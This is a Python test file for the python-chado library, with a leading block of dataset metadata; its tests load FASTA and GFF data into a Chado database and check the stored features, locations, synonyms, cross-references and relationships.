| 0.989006
| 0.988338
| 0
| 0.030157
| 0.545562
| 740,635
| 11,318
| 906
| 65.438682
| 0.735175
| 0.155398
| 0
| 0.853179
| 0
| 0.017213
| 0.113924
| 0.052692
| 0
| 0
| 0
| 0
| 0
| 1
| 0.097408
| false
| 0
| 0.034427
| 0
| 0.200081
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
40c173b15c494cacb0c9093874e1c6443097f271
| 94,821
|
py
|
Python
|
test/gff_test.py
|
DivSeek-Canada/python-chado
|
68648a10fcf26b73cf05e9a403c67e48e6b2f66f
|
[
"MIT"
] | null | null | null |
test/gff_test.py
|
DivSeek-Canada/python-chado
|
68648a10fcf26b73cf05e9a403c67e48e6b2f66f
|
[
"MIT"
] | null | null | null |
test/gff_test.py
|
DivSeek-Canada/python-chado
|
68648a10fcf26b73cf05e9a403c67e48e6b2f66f
|
[
"MIT"
] | 1
|
2021-05-02T14:49:57.000Z
|
2021-05-02T14:49:57.000Z
|
from nose.tools import raises
from . import ChadoTestCase, ci
class GFFTest(ChadoTestCase):
def _del_dbxref(self):
    """Delete test dbxref rows (db_id 1, VNBP*/…VIRU accessions) left behind by GFF tests."""
    dbxref = self.ci.model.dbxref
    is_test_accession = dbxref.accession.like('VNBP%') | dbxref.accession.like('%VIRU')
    self.ci.session.query(dbxref).filter(
        dbxref.db_id == 1,
        is_test_accession
    ).delete(synchronize_session='fetch')
def test_load_gff(self):
    """Load a genome FASTA then a GFF annotation and verify every piece
    lands in Chado correctly: gene/mRNA/polypeptide features, locations,
    synonyms, dbxrefs, featureprops, relationships, sub-features, multi-parent
    UTRs, Derives_from, ontology terms and Target locations.

    Fixed here: several assertion messages were copy-pasted from other
    sections and mislabeled what was being checked (gene/mRNA locs labelled
    "pep", sub-feature count labelled "single peptide", Target rank
    labelled "gene located").
    """
    org = self._create_fake_org()
    an = self._create_fake_an()
    an_gff = self._create_fake_an('gff')
    self.ci.feature.load_fasta(fasta="./test-data/genome.fa", analysis_id=an['analysis_id'], organism_id=org['organism_id'], sequence_type='supercontig')
    self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], no_seq_compute=True)
    gene_f = self.ci.session.query(self.ci.model.feature) \
        .filter_by(uniquename="orange1.1g015632m.g") \
        .join(self.ci.model.featureloc, self.ci.model.featureloc.feature_id == self.ci.model.feature.feature_id) \
        .join(self.ci.model.feature_synonym, self.ci.model.feature_synonym.feature_id == self.ci.model.feature.feature_id) \
        .join(self.ci.model.synonym, self.ci.model.feature_synonym.synonym_id == self.ci.model.synonym.synonym_id) \
        .one()
    geneterm = self.ci.get_cvterm_id('gene', 'sequence')
    # Check gene feature
    assert gene_f.dbxref_id is None, "gff>gene loaded correctly"
    assert gene_f.organism_id == org['organism_id'], "gff>gene loaded correctly"
    assert gene_f.name == "orange1.1g015632m.g", "gff>gene loaded correctly"
    assert gene_f.uniquename == "orange1.1g015632m.g", "gff>gene loaded correctly"
    assert gene_f.residues is None, "gff>gene loaded correctly"
    assert gene_f.seqlen is None, "gff>gene loaded correctly"
    assert gene_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>gene loaded correctly"
    assert gene_f.type_id == geneterm, "gff>gene loaded correctly"
    assert gene_f.is_analysis is False, "gff>gene loaded correctly"
    assert gene_f.is_obsolete is False, "gff>gene loaded correctly"
    # Check gene loc
    assert len(gene_f.featureloc_collection) == 1, "gff>gene located correctly"
    assert gene_f.featureloc_collection[0].fmin == 4058459, "gff>gene located correctly"
    assert gene_f.featureloc_collection[0].fmax == 4062210, "gff>gene located correctly"
    assert gene_f.featureloc_collection[0].is_fmin_partial is False, "gff>gene located correctly"
    assert gene_f.featureloc_collection[0].is_fmax_partial is False, "gff>gene located correctly"
    assert gene_f.featureloc_collection[0].strand == 1, "gff>gene located correctly"
    assert gene_f.featureloc_collection[0].phase is None, "gff>gene located correctly"
    assert gene_f.featureloc_collection[0].residue_info is None, "gff>gene located correctly"
    assert gene_f.featureloc_collection[0].locgroup == 0, "gff>gene located correctly"
    assert gene_f.featureloc_collection[0].rank == 0, "gff>gene located correctly"
    src_f = self.ci.session.query(self.ci.model.feature) \
        .filter_by(feature_id=gene_f.featureloc_collection[0].srcfeature_id) \
        .one()
    assert src_f.uniquename == "scaffold00001", "gff>gene loaded correctly"
    scaff1_id = src_f.feature_id
    # Check gene aliases
    exactterm = self.ci.get_cvterm_id('exact', 'synonym_type')
    syns = {synf.synonym.name: synf.synonym.type_id for synf in gene_f.feature_synonym_collection}
    assert len(syns) == 2, "gff>gene aliases loaded correctly"
    assert 'some-synonym' in syns, "gff>gene aliases loaded correctly"
    assert 'another synonym' in syns, "gff>gene aliases loaded correctly"
    assert syns['some-synonym'] == exactterm, "gff>gene aliases loaded correctly"
    assert syns['another synonym'] == exactterm, "gff>gene aliases loaded correctly"
    # Check gene dbxref
    dbs = self.ci.session.query(self.ci.model.db.db_id, self.ci.model.db.name, self.ci.model.db.description) \
        .filter((self.ci.model.db.name == 'GO') | (self.ci.model.db.name == 'FOOBAR') | (self.ci.model.db.name == 'FOOBARXX') | (self.ci.model.db.name == 'GFF_source'))
    for db in dbs:
        if db.name == "FOOBAR":
            assert db.description == "Added automatically by the GFF loader", "gff>gene dbxrefs db loaded correctly"
    dbs = {db.name: db.db_id for db in dbs}
    assert len(dbs) == 4, "gff>gene dbxrefs db loaded correctly"
    xrefs = {dbx.dbxref.accession: dbx.dbxref.db_id for dbx in gene_f.feature_dbxref_collection}
    assert len(xrefs) == 3, "gff>gene dbxrefs loaded correctly"
    assert '0061611' in xrefs, "gff>gene dbxrefs loaded correctly"
    assert '6528B' in xrefs, "gff>gene dbxrefs loaded correctly"
    assert 'phytozome6' in xrefs, "gff>gene dbxrefs loaded correctly"
    assert xrefs['0061611'] == dbs['GO'], "gff>gene dbxrefs loaded correctly"
    assert xrefs['6528B'] == dbs['FOOBAR'], "gff>gene dbxrefs loaded correctly"
    assert xrefs['phytozome6'] == dbs['GFF_source'], "gff>gene dbxrefs loaded correctly"
    # Check gene featureprop
    expected = [
        'Gap___BLABLA___0',
        'Gap___BLOBLO___1',
        'Note___that\'s fantastic___0',
        'Note___really___1',
        'Poutrelle___test___1',
        'Poutrelle___lapinou___0',
    ]
    assert len(gene_f.featureprop_collection) == 6, "gff>gene loaded correctly"
    for prop in gene_f.featureprop_collection:
        assert prop.cvterm.name + '___' + prop.value + '___' + str(prop.rank) in expected, "gff>gene loaded correctly"
        expected.remove(prop.cvterm.name + '___' + prop.value + '___' + str(prop.rank))
    # Check mrna
    rna_f = self.ci.session.query(self.ci.model.feature) \
        .filter_by(uniquename="PAC:18136219") \
        .join(self.ci.model.featureloc, self.ci.model.featureloc.feature_id == self.ci.model.feature.feature_id) \
        .join(self.ci.model.feature_synonym, self.ci.model.feature_synonym.feature_id == self.ci.model.feature.feature_id) \
        .join(self.ci.model.synonym, self.ci.model.feature_synonym.synonym_id == self.ci.model.synonym.synonym_id) \
        .one()
    rnaterm = self.ci.get_cvterm_id('mRNA', 'sequence')
    # Check mRNA feature
    assert rna_f.dbxref_id is None, "gff>mRNA loaded correctly"
    assert rna_f.organism_id == org['organism_id'], "gff>mRNA loaded correctly"
    assert rna_f.name == "orange1.1g015615m", "gff>mRNA loaded correctly"
    assert rna_f.uniquename == "PAC:18136219", "gff>mRNA loaded correctly"
    assert rna_f.residues is None, "gff>mRNA loaded correctly"
    assert rna_f.seqlen is None, "gff>mRNA loaded correctly"
    assert rna_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>mRNA loaded correctly"
    assert rna_f.type_id == rnaterm, "gff>mRNA loaded correctly"
    assert rna_f.is_analysis is False, "gff>mRNA loaded correctly"
    assert rna_f.is_obsolete is False, "gff>mRNA loaded correctly"
    # Check mRNA loc
    assert len(rna_f.featureloc_collection) == 1, "gff>mRNA located correctly"
    assert rna_f.featureloc_collection[0].fmin == 4058759, "gff>mRNA located correctly"
    assert rna_f.featureloc_collection[0].fmax == 4062210, "gff>mRNA located correctly"
    assert rna_f.featureloc_collection[0].is_fmin_partial is False, "gff>mRNA located correctly"
    assert rna_f.featureloc_collection[0].is_fmax_partial is False, "gff>mRNA located correctly"
    assert rna_f.featureloc_collection[0].strand == 1, "gff>mRNA located correctly"
    assert rna_f.featureloc_collection[0].phase is None, "gff>mRNA located correctly"
    assert rna_f.featureloc_collection[0].residue_info is None, "gff>mRNA located correctly"
    assert rna_f.featureloc_collection[0].locgroup == 0, "gff>mRNA located correctly"
    assert rna_f.featureloc_collection[0].rank == 0, "gff>mRNA located correctly"
    assert scaff1_id == rna_f.featureloc_collection[0].srcfeature_id, "gff>mRNA loaded correctly"
    # Check mRNA aliases
    exactterm = self.ci.get_cvterm_id('exact', 'synonym_type')
    syns = {synf.synonym.name: synf.synonym.type_id for synf in rna_f.feature_synonym_collection}
    assert len(syns) == 2, "gff>mRNA aliases loaded correctly"
    assert 'some-synonym' in syns, "gff>mRNA aliases loaded correctly"
    assert 'another synonym' in syns, "gff>mRNA aliases loaded correctly"
    assert syns['some-synonym'] == exactterm, "gff>mRNA aliases loaded correctly"
    assert syns['another synonym'] == exactterm, "gff>mRNA aliases loaded correctly"
    # Check mRNA dbxref
    xrefs = {dbx.dbxref.accession: dbx.dbxref.db_id for dbx in rna_f.feature_dbxref_collection}
    assert len(xrefs) == 3, "gff>mRNA dbxrefs loaded correctly"
    assert '0061621' in xrefs, "gff>mRNA dbxrefs loaded correctly"
    assert '6528A' in xrefs, "gff>mRNA dbxrefs loaded correctly"
    assert 'phytozome6' in xrefs, "gff>mRNA dbxrefs loaded correctly"
    assert xrefs['0061621'] == dbs['GO'], "gff>mRNA dbxrefs loaded correctly"
    assert xrefs['6528A'] == dbs['FOOBARXX'], "gff>mRNA dbxrefs loaded correctly"
    assert xrefs['phytozome6'] == dbs['GFF_source'], "gff>mRNA dbxrefs loaded correctly"
    # Check relationships
    parents = {x.object_id: x.type_id for x in rna_f.subject_in_relationships}
    assert len(parents) == 1, "mRNA relationships"
    partofterm = self.ci.get_cvterm_id('part_of', 'sequence')
    assert rna_f.subject_in_relationships[0].type_id == partofterm, "mRNA relationships"
    derivesfromterm = self.ci.get_cvterm_id('derives_from', 'sequence')
    peps = [x.subject_id for x in rna_f.object_in_relationships if x.type_id == derivesfromterm]
    assert len(peps) == 1, "mRNA relationships, single peptide"
    pep_f = self.ci.session.query(self.ci.model.feature) \
        .filter_by(feature_id=peps[0]) \
        .one()
    # Check pep feature
    pepterm = self.ci.get_cvterm_id('polypeptide', 'sequence')
    assert pep_f.dbxref_id is None, "gff>pep loaded correctly"
    assert pep_f.organism_id == org['organism_id'], "gff>pep loaded correctly"
    assert pep_f.name == "orange1.1g015615m", "gff>pep loaded correctly"
    assert pep_f.uniquename == "PAC:18136219-protein", "gff>pep loaded correctly"
    assert pep_f.residues is None, "gff>pep loaded correctly"
    assert pep_f.seqlen is None, "gff>pep loaded correctly"
    assert pep_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>pep loaded correctly"
    assert pep_f.type_id == pepterm, "gff>pep loaded correctly"
    assert pep_f.is_analysis is False, "gff>pep loaded correctly"
    assert pep_f.is_obsolete is False, "gff>pep loaded correctly"
    # Check pep loc
    assert len(pep_f.featureloc_collection) == 1, "gff>pep located correctly"
    assert pep_f.featureloc_collection[0].fmin == 4059234, "gff>pep located correctly"
    assert pep_f.featureloc_collection[0].fmax == 4061905, "gff>pep located correctly"
    assert pep_f.featureloc_collection[0].is_fmin_partial is False, "gff>pep located correctly"
    assert pep_f.featureloc_collection[0].is_fmax_partial is False, "gff>pep located correctly"
    assert pep_f.featureloc_collection[0].strand == 1, "gff>pep located correctly"
    assert pep_f.featureloc_collection[0].phase is None, "gff>pep located correctly"
    assert pep_f.featureloc_collection[0].residue_info is None, "gff>pep located correctly"
    assert pep_f.featureloc_collection[0].locgroup == 0, "gff>pep located correctly"
    assert pep_f.featureloc_collection[0].rank == 0, "gff>pep located correctly"
    assert scaff1_id == pep_f.featureloc_collection[0].srcfeature_id, "gff>pep loaded correctly"
    # All remaining (non-derives_from) children of the mRNA: CDS/exon/UTRs
    children = {x.subject_id: x for x in rna_f.object_in_relationships if x.type_id != derivesfromterm}
    assert len(children) == 15, "mRNA relationships, sub-features"
    cdsterm = self.ci.get_cvterm_id('CDS', 'sequence')
    exonterm = self.ci.get_cvterm_id('exon', 'sequence')
    utr3term = self.ci.get_cvterm_id('three_prime_UTR', 'sequence')
    utr5term = self.ci.get_cvterm_id('five_prime_UTR', 'sequence')
    for c in children:
        assert children[c].type_id == partofterm, "subsubfeatures"
        if children[c].subject.type_id == utr3term:
            subsub_f = children[c].subject
        assert children[c].subject.type_id in (cdsterm, exonterm, utr3term, utr5term), "subsubfeatures"
    # Check a subsubfeature
    assert subsub_f.dbxref_id is None, "gff>utr loaded correctly"
    assert subsub_f.organism_id == org['organism_id'], "gff>utr loaded correctly"
    assert subsub_f.name.endswith("-three_prime_UTR-scaffold00001:4061905..4062210"), "gff>utr loaded correctly"
    assert subsub_f.uniquename.endswith("-three_prime_UTR-scaffold00001:4061905..4062210"), "gff>utr loaded correctly"
    assert subsub_f.residues is None, "gff>utr loaded correctly"
    assert subsub_f.seqlen is None, "gff>utr loaded correctly"
    assert subsub_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>utr loaded correctly"
    assert subsub_f.type_id == utr3term, "gff>utr loaded correctly"
    assert subsub_f.is_analysis is False, "gff>utr loaded correctly"
    assert subsub_f.is_obsolete is False, "gff>utr loaded correctly"
    assert len(subsub_f.featureloc_collection) == 1, "gff>utr located correctly"
    assert subsub_f.featureloc_collection[0].fmin == 4061905, "gff>utr located correctly"
    assert subsub_f.featureloc_collection[0].fmax == 4062210, "gff>utr located correctly"
    assert subsub_f.featureloc_collection[0].is_fmin_partial is False, "gff>utr located correctly"
    assert subsub_f.featureloc_collection[0].is_fmax_partial is False, "gff>utr located correctly"
    assert subsub_f.featureloc_collection[0].strand == 1, "gff>utr located correctly"
    assert subsub_f.featureloc_collection[0].phase is None, "gff>utr located correctly"
    assert subsub_f.featureloc_collection[0].residue_info is None, "gff>utr located correctly"
    assert subsub_f.featureloc_collection[0].locgroup == 0, "gff>utr located correctly"
    assert subsub_f.featureloc_collection[0].rank == 0, "gff>utr located correctly"
    # Check utr with 2 parents
    confused_child_f = self.ci.session.query(self.ci.model.feature) \
        .filter_by(uniquename='an_utr_with_two_parents') \
        .all()
    assert len(confused_child_f) == 1, "1 utr with 2 parents"
    confused_rels = confused_child_f[0].subject_in_relationships
    assert len(confused_rels) == 2, "1 utr with 2 parents"
    for r in confused_rels:
        assert (r.object.uniquename == 'PAC:18136239') or (r.object.uniquename == 'PAC:18136238'), "1 utr with 2 parents"
    # Check Derives_from
    derivesfrom = self.ci.session.query(self.ci.model.feature) \
        .filter_by(uniquename='some_special_cds') \
        .all()
    assert len(derivesfrom) == 1, "derives_from"
    derivesfrom_rels = derivesfrom[0].subject_in_relationships
    assert len(derivesfrom_rels) == 2, "derives_from"
    for r in derivesfrom_rels:
        assert (r.object.uniquename == 'PAC:18136217') or (r.object.uniquename == 'PAC:18136225'), "derives_from"
    terms = {cvt.cvterm.name: cvt.cvterm.dbxref.db_id for cvt in derivesfrom[0].feature_cvterm_collection}
    assert len(terms) == 2, "gff>ontology_term loaded correctly"
    assert '000001' in terms, "gff>ontology_term loaded correctly"
    assert '00002' in terms, "gff>ontology_term loaded correctly"
    assert terms['000001'] == dbs['GO'], "gff>ontology_term loaded correctly"
    assert terms['00002'] == dbs['GO'], "gff>ontology_term loaded correctly"
    # Target location (two featurelocs; find the one with fmin == 120)
    assert len(derivesfrom[0].featureloc_collection) == 2, "gff>target loc ok"
    if derivesfrom[0].featureloc_collection[0].fmin == 120:
        checkedloc = 0
    else:
        checkedloc = 1
    assert derivesfrom[0].featureloc_collection[checkedloc].fmin == 120, "gff>target loc ok"
    assert derivesfrom[0].featureloc_collection[checkedloc].fmax == 320, "gff>target loc ok"
    assert derivesfrom[0].featureloc_collection[checkedloc].strand == -1, "gff>target loc ok"
    assert derivesfrom[0].featureloc_collection[checkedloc].rank == 1, "gff>target loc ok"
def test_load_gff_pepregex(self):
    """Loading with re_protein + re_protein_capture must rewrite polypeptide uniquenames."""
    org = self._create_fake_org()
    an = self._create_fake_an()
    an_gff = self._create_fake_an('gff')
    self.ci.feature.load_fasta(fasta="./test-data/genome.fa", analysis_id=an['analysis_id'], organism_id=org['organism_id'], sequence_type='supercontig')
    self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], re_protein="foo\\1-bar", re_protein_capture="PAC:([0-9]+)", no_seq_compute=True)
    model = self.ci.model
    # Fetch the loaded mRNA
    mrna = self.ci.session.query(model.feature) \
        .filter_by(uniquename="PAC:18136219") \
        .join(model.featureloc, model.featureloc.feature_id == model.feature.feature_id) \
        .join(model.feature_synonym, model.feature_synonym.feature_id == model.feature.feature_id) \
        .join(model.synonym, model.feature_synonym.synonym_id == model.synonym.synonym_id) \
        .one()
    # The mRNA has a single part_of parent (its gene)
    parent_types = {rel.object_id: rel.type_id for rel in mrna.subject_in_relationships}
    assert len(parent_types) == 1, "mRNA relationships"
    partofterm = self.ci.get_cvterm_id('part_of', 'sequence')
    assert mrna.subject_in_relationships[0].type_id == partofterm, "mRNA relationships"
    # Exactly one polypeptide derives from the mRNA...
    derivesfromterm = self.ci.get_cvterm_id('derives_from', 'sequence')
    pep_ids = [rel.subject_id for rel in mrna.object_in_relationships if rel.type_id == derivesfromterm]
    assert len(pep_ids) == 1, "mRNA relationships, single peptide"
    protein = self.ci.session.query(model.feature) \
        .filter_by(feature_id=pep_ids[0]) \
        .one()
    # ...and its uniquename was rewritten using the captured PAC id
    assert protein.uniquename == "foo18136219-bar", "gff>pep loaded correctly"
def test_load_gff_pepregex2(self):
    """With re_protein but no re_protein_capture, \\1 captures the whole mRNA id."""
    org = self._create_fake_org()
    an = self._create_fake_an()
    an_gff = self._create_fake_an('gff')
    self.ci.feature.load_fasta(fasta="./test-data/genome.fa", analysis_id=an['analysis_id'], organism_id=org['organism_id'], sequence_type='supercontig')
    self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], re_protein="foo\\1-bar", no_seq_compute=True)
    model = self.ci.model
    # Fetch the loaded mRNA
    mrna = self.ci.session.query(model.feature) \
        .filter_by(uniquename="PAC:18136219") \
        .join(model.featureloc, model.featureloc.feature_id == model.feature.feature_id) \
        .join(model.feature_synonym, model.feature_synonym.feature_id == model.feature.feature_id) \
        .join(model.synonym, model.feature_synonym.synonym_id == model.synonym.synonym_id) \
        .one()
    # The mRNA has a single part_of parent (its gene)
    parent_types = {rel.object_id: rel.type_id for rel in mrna.subject_in_relationships}
    assert len(parent_types) == 1, "mRNA relationships"
    partofterm = self.ci.get_cvterm_id('part_of', 'sequence')
    assert mrna.subject_in_relationships[0].type_id == partofterm, "mRNA relationships"
    # Exactly one polypeptide derives from the mRNA...
    derivesfromterm = self.ci.get_cvterm_id('derives_from', 'sequence')
    pep_ids = [rel.subject_id for rel in mrna.object_in_relationships if rel.type_id == derivesfromterm]
    assert len(pep_ids) == 1, "mRNA relationships, single peptide"
    protein = self.ci.session.query(model.feature) \
        .filter_by(feature_id=pep_ids[0]) \
        .one()
    # ...and its uniquename embeds the full original id
    assert protein.uniquename == "fooPAC:18136219-bar", "gff>pep loaded correctly"
def test_load_gff_twice(self):
    """Loading the same GFF twice must be idempotent.

    The second load_gff call should not duplicate features, locations,
    synonyms, dbxrefs, properties or relationships in the db.
    """
    org = self._create_fake_org()
    an = self._create_fake_an()
    an_gff = self._create_fake_an('gff')
    # Adding twice the same gff should not change anything in the db
    self.ci.feature.load_fasta(fasta="./test-data/genome.fa", analysis_id=an['analysis_id'], organism_id=org['organism_id'], sequence_type='supercontig')
    self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], no_seq_compute=True)
    self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], no_seq_compute=True)
    gene_f = self.ci.session.query(self.ci.model.feature) \
        .filter_by(uniquename="orange1.1g015632m.g") \
        .join(self.ci.model.featureloc, self.ci.model.featureloc.feature_id == self.ci.model.feature.feature_id) \
        .join(self.ci.model.feature_synonym, self.ci.model.feature_synonym.feature_id == self.ci.model.feature.feature_id) \
        .join(self.ci.model.synonym, self.ci.model.feature_synonym.synonym_id == self.ci.model.synonym.synonym_id) \
        .one()
    geneterm = self.ci.get_cvterm_id('gene', 'sequence')
    # Check gene feature
    assert gene_f.dbxref_id is None, "gff>gene loaded correctly"
    assert gene_f.organism_id == org['organism_id'], "gff>gene loaded correctly"
    assert gene_f.name == "orange1.1g015632m.g", "gff>gene loaded correctly"
    assert gene_f.uniquename == "orange1.1g015632m.g", "gff>gene loaded correctly"
    assert gene_f.residues is None, "gff>gene loaded correctly"
    assert gene_f.seqlen is None, "gff>gene loaded correctly"
    # md5 of the empty string: no sequence computed (no_seq_compute=True)
    assert gene_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>gene loaded correctly"
    assert gene_f.type_id == geneterm, "gff>gene loaded correctly"
    assert gene_f.is_analysis is False, "gff>gene loaded correctly"
    assert gene_f.is_obsolete is False, "gff>gene loaded correctly"
    # Check gene loc
    assert len(gene_f.featureloc_collection) == 1, "gff>gene located correctly"
    assert gene_f.featureloc_collection[0].fmin == 4058459, "gff>gene located correctly"
    assert gene_f.featureloc_collection[0].fmax == 4062210, "gff>gene located correctly"
    assert gene_f.featureloc_collection[0].is_fmin_partial is False, "gff>gene located correctly"
    assert gene_f.featureloc_collection[0].is_fmax_partial is False, "gff>gene located correctly"
    assert gene_f.featureloc_collection[0].strand == 1, "gff>gene located correctly"
    assert gene_f.featureloc_collection[0].phase is None, "gff>gene located correctly"
    assert gene_f.featureloc_collection[0].residue_info is None, "gff>gene located correctly"
    assert gene_f.featureloc_collection[0].locgroup == 0, "gff>gene located correctly"
    assert gene_f.featureloc_collection[0].rank == 0, "gff>gene located correctly"
    src_f = self.ci.session.query(self.ci.model.feature) \
        .filter_by(feature_id=gene_f.featureloc_collection[0].srcfeature_id) \
        .one()
    assert src_f.uniquename == "scaffold00001", "gff>gene loaded correctly"
    scaff1_id = src_f.feature_id
    # Check gene aliases
    exactterm = self.ci.get_cvterm_id('exact', 'synonym_type')
    syns = {synf.synonym.name: synf.synonym.type_id for synf in gene_f.feature_synonym_collection}
    assert len(syns) == 2, "gff>gene aliases loaded correctly"
    assert 'some-synonym' in syns, "gff>gene aliases loaded correctly"
    assert 'another synonym' in syns, "gff>gene aliases loaded correctly"
    assert syns['some-synonym'] == exactterm, "gff>gene aliases loaded correctly"
    assert syns['another synonym'] == exactterm, "gff>gene aliases loaded correctly"
    # Check gene dbxref
    dbs = self.ci.session.query(self.ci.model.db.db_id, self.ci.model.db.name, self.ci.model.db.description) \
        .filter((self.ci.model.db.name == 'GO') | (self.ci.model.db.name == 'FOOBAR') | (self.ci.model.db.name == 'FOOBARXX') | (self.ci.model.db.name == 'GFF_source'))
    for db in dbs:
        if db.name == "FOOBAR":
            # The FOOBAR db does not pre-exist: the loader must create it
            assert db.description == "Added automatically by the GFF loader", "gff>gene dbxrefs db loaded correctly"
    dbs = {db.name: db.db_id for db in dbs}
    assert len(dbs) == 4, "gff>gene dbxrefs db loaded correctly"
    xrefs = {dbx.dbxref.accession: dbx.dbxref.db_id for dbx in gene_f.feature_dbxref_collection}
    assert len(xrefs) == 3, "gff>gene dbxrefs loaded correctly"
    assert '0061611' in xrefs, "gff>gene dbxrefs loaded correctly"
    assert '6528B' in xrefs, "gff>gene dbxrefs loaded correctly"
    assert 'phytozome6' in xrefs, "gff>gene dbxrefs loaded correctly"
    assert xrefs['0061611'] == dbs['GO'], "gff>gene dbxrefs loaded correctly"
    assert xrefs['6528B'] == dbs['FOOBAR'], "gff>gene dbxrefs loaded correctly"
    assert xrefs['phytozome6'] == dbs['GFF_source'], "gff>gene dbxrefs loaded correctly"
    # Check gene featureprop (each entry is cvterm___value___rank)
    expected = [
        'Gap___BLABLA___0',
        'Gap___BLOBLO___1',
        'Note___that\'s fantastic___0',
        'Note___really___1',
        'Poutrelle___test___1',
        'Poutrelle___lapinou___0',
    ]
    assert len(gene_f.featureprop_collection) == 6, "gff>gene loaded correctly"
    for prop in gene_f.featureprop_collection:
        assert prop.cvterm.name + '___' + prop.value + '___' + str(prop.rank) in expected, "gff>gene loaded correctly"
        expected.remove(prop.cvterm.name + '___' + prop.value + '___' + str(prop.rank))
    # Check mrna
    rna_f = self.ci.session.query(self.ci.model.feature) \
        .filter_by(uniquename="PAC:18136219") \
        .join(self.ci.model.featureloc, self.ci.model.featureloc.feature_id == self.ci.model.feature.feature_id) \
        .join(self.ci.model.feature_synonym, self.ci.model.feature_synonym.feature_id == self.ci.model.feature.feature_id) \
        .join(self.ci.model.synonym, self.ci.model.feature_synonym.synonym_id == self.ci.model.synonym.synonym_id) \
        .one()
    rnaterm = self.ci.get_cvterm_id('mRNA', 'sequence')
    # Check mRNA feature
    assert rna_f.dbxref_id is None, "gff>mRNA loaded correctly"
    assert rna_f.organism_id == org['organism_id'], "gff>mRNA loaded correctly"
    assert rna_f.name == "orange1.1g015615m", "gff>mRNA loaded correctly"
    assert rna_f.uniquename == "PAC:18136219", "gff>mRNA loaded correctly"
    assert rna_f.residues is None, "gff>mRNA loaded correctly"
    assert rna_f.seqlen is None, "gff>mRNA loaded correctly"
    assert rna_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>mRNA loaded correctly"
    assert rna_f.type_id == rnaterm, "gff>mRNA loaded correctly"
    assert rna_f.is_analysis is False, "gff>mRNA loaded correctly"
    assert rna_f.is_obsolete is False, "gff>mRNA loaded correctly"
    # Check mRNA loc
    assert len(rna_f.featureloc_collection) == 1, "gff>mRNA located correctly"
    assert rna_f.featureloc_collection[0].fmin == 4058759, "gff>mRNA located correctly"
    assert rna_f.featureloc_collection[0].fmax == 4062210, "gff>mRNA located correctly"
    assert rna_f.featureloc_collection[0].is_fmin_partial is False, "gff>mRNA located correctly"
    assert rna_f.featureloc_collection[0].is_fmax_partial is False, "gff>mRNA located correctly"
    assert rna_f.featureloc_collection[0].strand == 1, "gff>mRNA located correctly"
    assert rna_f.featureloc_collection[0].phase is None, "gff>mRNA located correctly"
    assert rna_f.featureloc_collection[0].residue_info is None, "gff>mRNA located correctly"
    assert rna_f.featureloc_collection[0].locgroup == 0, "gff>mRNA located correctly"
    assert rna_f.featureloc_collection[0].rank == 0, "gff>mRNA located correctly"
    assert scaff1_id == rna_f.featureloc_collection[0].srcfeature_id, "gff>mRNA loaded correctly"
    # Check mRNA aliases
    exactterm = self.ci.get_cvterm_id('exact', 'synonym_type')
    syns = {synf.synonym.name: synf.synonym.type_id for synf in rna_f.feature_synonym_collection}
    assert len(syns) == 2, "gff>mRNA aliases loaded correctly"
    assert 'some-synonym' in syns, "gff>mRNA aliases loaded correctly"
    assert 'another synonym' in syns, "gff>mRNA aliases loaded correctly"
    assert syns['some-synonym'] == exactterm, "gff>mRNA aliases loaded correctly"
    assert syns['another synonym'] == exactterm, "gff>mRNA aliases loaded correctly"
    # Check mRNA dbxref
    xrefs = {dbx.dbxref.accession: dbx.dbxref.db_id for dbx in rna_f.feature_dbxref_collection}
    assert len(xrefs) == 3, "gff>mRNA dbxrefs loaded correctly"
    assert '0061621' in xrefs, "gff>mRNA dbxrefs loaded correctly"
    assert '6528A' in xrefs, "gff>mRNA dbxrefs loaded correctly"
    assert 'phytozome6' in xrefs, "gff>mRNA dbxrefs loaded correctly"
    assert xrefs['0061621'] == dbs['GO'], "gff>mRNA dbxrefs loaded correctly"
    assert xrefs['6528A'] == dbs['FOOBARXX'], "gff>mRNA dbxrefs loaded correctly"
    assert xrefs['phytozome6'] == dbs['GFF_source'], "gff>mRNA dbxrefs loaded correctly"
    # Check relationships
    parents = {x.object_id: x.type_id for x in rna_f.subject_in_relationships}
    assert len(parents) == 1, "mRNA relationships"
    partofterm = self.ci.get_cvterm_id('part_of', 'sequence')
    assert rna_f.subject_in_relationships[0].type_id == partofterm, "mRNA relationships"
    derivesfromterm = self.ci.get_cvterm_id('derives_from', 'sequence')
    peps = [x.subject_id for x in rna_f.object_in_relationships if x.type_id == derivesfromterm]
    assert len(peps) == 1, "mRNA relationships, single peptide"
    pep_f = self.ci.session.query(self.ci.model.feature) \
        .filter_by(feature_id=peps[0]) \
        .one()
    # Check pep feature
    pepterm = self.ci.get_cvterm_id('polypeptide', 'sequence')
    assert pep_f.dbxref_id is None, "gff>pep loaded correctly"
    assert pep_f.organism_id == org['organism_id'], "gff>pep loaded correctly"
    assert pep_f.name == "orange1.1g015615m", "gff>pep loaded correctly"
    assert pep_f.uniquename == "PAC:18136219-protein", "gff>pep loaded correctly"
    assert pep_f.residues is None, "gff>pep loaded correctly"
    assert pep_f.seqlen is None, "gff>pep loaded correctly"
    assert pep_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>pep loaded correctly"
    assert pep_f.type_id == pepterm, "gff>pep loaded correctly"
    assert pep_f.is_analysis is False, "gff>pep loaded correctly"
